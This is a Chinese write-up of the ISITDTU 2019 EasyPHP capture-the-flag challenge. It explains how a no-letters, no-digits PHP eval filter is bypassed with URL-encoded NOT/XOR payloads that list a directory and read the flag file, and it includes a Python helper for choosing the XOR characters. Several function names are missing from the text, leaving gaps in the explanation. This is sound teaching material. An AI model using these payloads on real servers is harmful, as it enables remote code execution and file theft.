[ISITDTU 2019]EasyPHP异或绕过
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
目录
前言
一、前提知识
二、题目详解
总结
前言
提示:这里可以添加本文要记录的大概内容:
放假的日子比较躺平,今天难得静下心做了下题,做了这个题,耐心值直接被拉满,同时也觉得知识点比较新,记录下来巩固下无数字字母RCE。
提示:以下是本篇文章正文内容,下面案例可供参考
一、前提知识
1,()函数
() 函数返回字符串所用字符的信息(例如,ASCII 字符在字符串中出现的次数,或者某个字符是否已经在字符串中使用过)。
例子:
二、题目详解
1,进入题目,直接看到源码:
0xd )die('you are so close, omg');eval($_);明显是一道代码/命令执行的类型的题目,绕过两个if,进行代码的执行。
2,源码分析:
$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )die('rosé will not do it');正则匹配\x00(NULL)-\x20(Space),数字0-9
正则匹配'"`$&.,|[{] 和\x7F(DEL)这些字符
传入的_参数不能含有这些字符,明显是无字符数字RCE类型,可以使用取反绕过
if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )die('you are so close, omg');对传入的_参数进行不一样的字符的统计,不能超过13个字符
3,解题
先使用取反绕过试试查看()
取反和异或%FF得到的结果一样
禁用的函数有:
,,,,,,,,,,,,dler,h,,,,,,,,,,,exec,,,,,,,,mail,,
可以使用(),(),(),()等函数查看目录,并获取flag,先获取看目录下的文件,通过((.))输出当前目录下的内容,同样使用取反绕过。
((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF));
但是问题在于,上方的不同的字符并不满足不大于13个,可以通过本地测试得知
有16个字符,也就是需要缩小3个字符才能通过第二个if,这里看了别人的WP,看了挺久才看懂,耐心值被拉满。
解释:
str = 'pscadi'
target = 'ntr'for m in target:for a in str:for b in str:for c in str:if ord(a)^ord(b)^ord(c) == ord(m):print("{} = {}^{}^{}".format(m,a,b,c))
输出(取了三个结果):
n = c^d^i
t = s^c^d
r = p^c^a()函数统计的是字符串所用不同字符的个数,所以可以使用异或的方法,通过已存在的字符构造三个没有的字符,这样16个字符就变成了13个。
比如构造n=c^d^i,那么n的取反就是n^0xff=c^d^i^0xff也是可以的,即%91^%FF=%9C^%9B%96^%FF。同理t也可以进行变换成%8B^%FF=%9C^%9B^%8C^%FF
那么我们的即((.))将其中的ntr也替换掉即可变成13个字符
:
(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)
变换成:
(%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)
:
(%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF)
变换成
(%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)
变换后的:
((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C))^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));
通过本地测试查看是否为原字符
读取出目录下的文件:
flag文件在最后,可以使用end直接将指针执行最后一个文件,然后读取,使用(end((.));
同样先将(end((.));进行取反操作
((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%91%9B)^(%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));
同样是16个字符,要使用三个已存在的字符异或生成三个不存在的字符,变成13个字符。
str = 'readfile'
target = 'nsc'for m in target:for a in str:for b in str:for c in str:if ord(a)^ord(b)^ord(c) == ord(m):print("{} = {}^{}^{}".format(m,a,b,c))输出(取三个结果):
n = a^f^i
s = r^e^d
c = a^d^f同理将nsc分别进行异或的生成得到:
((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));
总结
看别人的WP看了挺久才看懂,看懂了自己操作去替换的时候也做了好久,真的很需要耐心,短短的代码花了很多时间。
